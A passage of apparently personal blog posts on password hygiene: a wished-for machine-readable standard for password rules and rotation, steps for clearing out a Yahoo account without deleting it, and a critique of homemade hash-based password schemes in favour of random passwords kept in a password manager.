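                and sum(c.islower() for c in candidate) >= rules["min_lower"]
                and sum(c.isdigit() for c in candidate) >= rules["min_digits"]):
            return candidate
```

    No back-and-forth with the website’s error messages, no guessing: the rules are machine-readable, so the first password the manager submits is guaranteed to be accepted.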

    Further suppose that the standard defined the calling conventions of a REST endpoint for changing passwords, and the rules file included that URL like:

    change_url: /ajax/change_my_password
    

    Wouldn’t it be just lovely if 1Password could automatically update every such website on a monthly basis, or whenever a site announces a security breach?
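    Since no such standard exists, everything below is invented — the payload field names, the endpoint shape, all of it — but a manager’s rotation step might reduce to building one request against that URL:

```python
# Hypothetical: no such standard exists, so the endpoint shape and the
# payload field names here are my own invention.
def build_change_request(base_url, change_url, old_password, new_password):
    return {
        "method": "POST",
        "url": base_url.rstrip("/") + change_url,
        "json": {"current_password": old_password,
                 "new_password": new_password},
    }
```

    A password manager could then fire that request for every saved login on a schedule, which is the “rotate everything monthly” dream.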

    Purge your Yahoo account (but don't delete it!)

    There are about 1.5 billion reasons to want to cancel your Yahoo account. Don’t do that!

    According to Yahoo’s account deletion page, they “may allow other users to sign up for and use your current Yahoo! ID and profile names after your account has been deleted”:

    Yahoo! account reuse

    This is a terrible policy not shared by other service providers, and there are many scenarios where it’s a huge security problem for Yahoo’s users. For example:

    • You register for Facebook with your me@yahoo.com email address.
    • You forget about that, read about the newest Yahoo user database hack, and delete your Yahoo account.
    • A month later, someone else signs up to get your me@yahoo.com email address. They use Facebook’s password reset mechanism to take control of your account, download your private photos, and say nasty things to your friends.
    • Oh, and anyone you forgot to share your new address with is still sending personal communications to your old Yahoo address, and its new owner is reading them.

    Here’s what you should do instead:

    Purge your Yahoo account

    It’s time to move on. Yahoo has a terrible security track record and shows no signs of improving.

    First, understand what you’ll be doing here. You’ll be removing everything from your Yahoo account: your email, contacts, events, and so on. Permanently. There’s no changing your mind. It’s extreme, sure, but until you do, it’s likely that hackers can:

    • Read messages from your spouse or partner.
    • See your calendar events to know when you’ll be away from the house.
    • Take over your account and start resetting every password associated with it, like Facebook, Amazon, and your bank.

    Don’t delete your account. Clean it out!

    Secure it

    Before doing anything else, change your Yahoo password! Hackers probably have your current one. I’m not exaggerating.

    Once that’s done, turn on two-factor authentication (2FA). This can prevent hackers from accessing your account even if they get your password.

    Once that’s done, make a note to yourself to turn on 2FA for every other account you have that supports it.

    Make your new home

    Before you start, you’ll want to create an email account with a new provider. Lots of people like Gmail but pick one that looks good to you. This will be your new home account on the Internet: the email address that you give out to friends and coworkers and that you use to log into websites.

    Clear your email

    • Log into your Yahoo mail.
    • Click the little checkbox above your emails to select all of them.
    • Click the Delete button to delete all email on that page. If you have lots of messages, you may have to repeat this several times.
    • Hover over the Trash mailbox to make the trashcan icon appear. Click the trashcan.
    Trash icon
    • Confirm that you want to empty your trash.
    Confirm emptying trash

    Clear everything else

    If you’re like most people, that’s probably 99% of your Yahoo data. You’re not quite done yet, though! Now click through each of the services in the little icons in the top left corner:

    Other services to clear

    They all may have more information stored in them. Each works a little differently, but you should be able to figure out how to clean them all out.

    Set a vacation reminder

    Other email providers make it easy to forward all of your incoming mail to a new account. Yahoo recently removed that feature, so you can’t use that convenient approach. Instead, you’ll set up a Vacation Response to tell people about your new address.

    • Click the settings gear in the top right corner.
    • Choose Settings, then Vacation Response.
    • Check the box to “Enable automatic response”, and set the Until: year to as far in the future as it will let you.
    Example vacation reminder
    • Enter a message like:

    I may now be reached at me@example.com. Please update your address book. Thanks!

    • Click Save.

    Now anyone writing to you will get a message with your new address, but their email will still land in your Yahoo inbox.

    Change your logins

    Now go through your web accounts and change all of them where you log in with me@yahoo.com to use your new email address instead. If you use a password manager to keep track of your accounts, this will be easy. Time consuming — thanks, Yahoo! — but easy.

    Check back

    You’re going to miss a few accounts, and some friends or family will stubbornly insist on sending email to your old address. Set a reminder or mark your calendar to check your Yahoo mail a month from now to see who’s written to you. Update each of those people or accounts, then delete all of your new messages. Check again in another month and then another after that. Eventually this will slow to a trickle and you can forget about your old Yahoo account for many months at a time (or until the next news article about a giant Yahoo hack comes along, and then you can smile to yourself because it doesn’t affect you anymore).

    Conclusion

    Migrating off Yahoo is a pain in the neck. Google, in contrast, makes it easy to extract all your information and then securely close your account. Yahoo does not. It won’t be quick or painless, but I recommend that you start now.

    On Generated Versus Random Passwords

    I was reading a story about a hacked password database and saw this comment where the poster wanted to make a little program to generate non-random passwords for every site he visits:

    I was thinking of something simpler such as “echo MyPassword69! slashdot.org|md5sum” and then “aaa53a64cbb02f01d79e6aa05f0027ba” using that as my password since many sites will take 32-character long passwords or they will truncate for you. More generalized than PasswordMaker and easier to access but no alpha-num+symbol translation and only (32) 0-9af characters but that should be random enough, or you can do sha1sum instead for a little longer hash string.

    I posted a reply but I wanted to repeat it here for the sake of my friends who don’t read Slashdot. If you’ve ever cooked up your own scheme for coming up with passwords or if you’ve used the PasswordMaker system (or ones like it), you need to read this:

    DO NOT DO THIS. I don’t mean this disrespectfully, but you don’t know what you’re doing. That’s OK! People not named Bruce generally suck at secure algorithms. Crypto is hard, with unexpected implications that stay hidden until you’re much more knowledgeable on the subject than you (or I) currently are. For example, suppose that hypothetical site helpfully truncates your password to 8 chars. By storing only 8 hex digits, you’ve reduced your password’s keyspace to just 32 bits. If you used an algorithm with base64 encoding instead, you’d get the same complexity in only 5.3 chars.
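    The arithmetic, spelled out in plain Python with the numbers above:

```python
import math

# 8 hex characters: 16 possible values each, log2(16) = 4 bits apiece,
# so the truncated password carries only 32 bits of keyspace.
hex_bits = 8 * math.log2(16)

# Base64 packs log2(64) = 6 bits into each character, so those same
# 32 bits fit in about 5.33 characters.
b64_chars = hex_bits / math.log2(64)
```

    In other words, hex encoding throws away a third of the strength each character could carry.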

    Despite what you claim, you’re really much better off using a secure storage app that creates truly random passwords for you and stores them in a securely encrypted file. In another post here I mention that I use 1Password, but really any reputable app will get you the same protections. Your algorithm is a “security by obscurity” system; if someone knows your algorithm, gaining your master password gives them full access to every account you have. Contrast with a password locker where you can change your master password before the attacker gets access to the secret store (which they may never be able to do if you’ve kept it secure!), and in the worst case scenario provides you with a list of accounts you need to change.

    I haven’t used PasswordMaker but I’d apply the same criticisms to them. If an attacker knows that you use PasswordMaker, they can narrow down the search space based on the very few things you can vary:

    • URL (the attacker will have this)
    • character set (dropdown gives you 6 choices)
    • which of nine hash algorithms was used (actually 13 — the FAQ is outdated)
    • modifier (algorithmically, part of your password)
    • username (attacker will have this or can likely guess it easily)
    • password length (let’s say, likely to be between 8 and 20 chars, so 13 options)
    • password prefix (stupid idea that reduces your password’s complexity)
    • password suffix (stupid idea that reduces your password’s complexity)
    • which of nine l33t-speak levels was used
    • when l33t-speak was applied (total of 28 options: 9 levels each at three different “Use l33t” times, plus “not at all”)

    My comments about the modifier being part of your password? You’re basically concatenating those strings to create a longer master password, so it offers no protection beyond the master password itself. And that’s assuming you actually use the modifier.

    So, back to our attack scenario where a hacker has your master password, username, and a URL they want to visit: disregarding the prefix and suffix options, they have 6 * 13 * 13 * 28 = 28,392 possible output passwords to test. That should keep them busy for at least a minute or two. And once they’ve guessed your combination, they can probably use the same settings on every other website you visit. Oh, and when you’ve found out that your password is compromised? Hope you remember every website you’ve ever used PasswordMaker on!
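    If you want to check my math, here’s the tally of the options listed above:

```python
# Option counts from the list above (prefix and suffix disregarded).
charsets = 6         # character-set dropdown
hashes = 13          # hash algorithms actually available
lengths = 13         # lengths 8 through 20, inclusive
leet = 9 * 3 + 1     # 9 l33t levels at 3 application times, plus "not at all"

candidates = charsets * hashes * lengths * leet   # 28,392 passwords to test
```

    At even a few thousand guesses per second against a stolen hash, that search space evaporates almost instantly.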

    Finally, if you’ve ever used the online version of PasswordMaker, even once, then you have to assume that your password is compromised. If their site has ever been compromised — and it’s hosted on a content delivery network with a lot of other websites — the attacker could easily have placed a script on the page to submit everything you type into the password generation form to a server in a distant country. Security demands that you have to assume this has happened.

    Seriously, please don’t do this stuff. I’d much rather see you using pwgen to create truly random passwords and then using something like GnuPG to store them all in a strongly-encrypted file.
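    For the curious, the “truly random” part is only a few lines of Python with the standard secrets module. This is a sketch of the idea, not a replacement for a real tool:

```python
import secrets
import string

# Roughly what `pwgen -s 20 1` gives you: 20 characters drawn uniformly
# at random from letters and digits, using the OS's CSPRNG.
alphabet = string.ascii_letters + string.digits
password = "".join(secrets.choice(alphabet) for _ in range(20))
```

    The point is that every character is independent and unpredictable — nothing about it can be derived from a site name or a master phrase.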

    The summary version is this: use a password manager like 1Password to use a different hard-to-guess password on every website you visit. Don’t use some invented system to come up with passwords on your own because there’s a very poor chance that we mere mortals will get it right.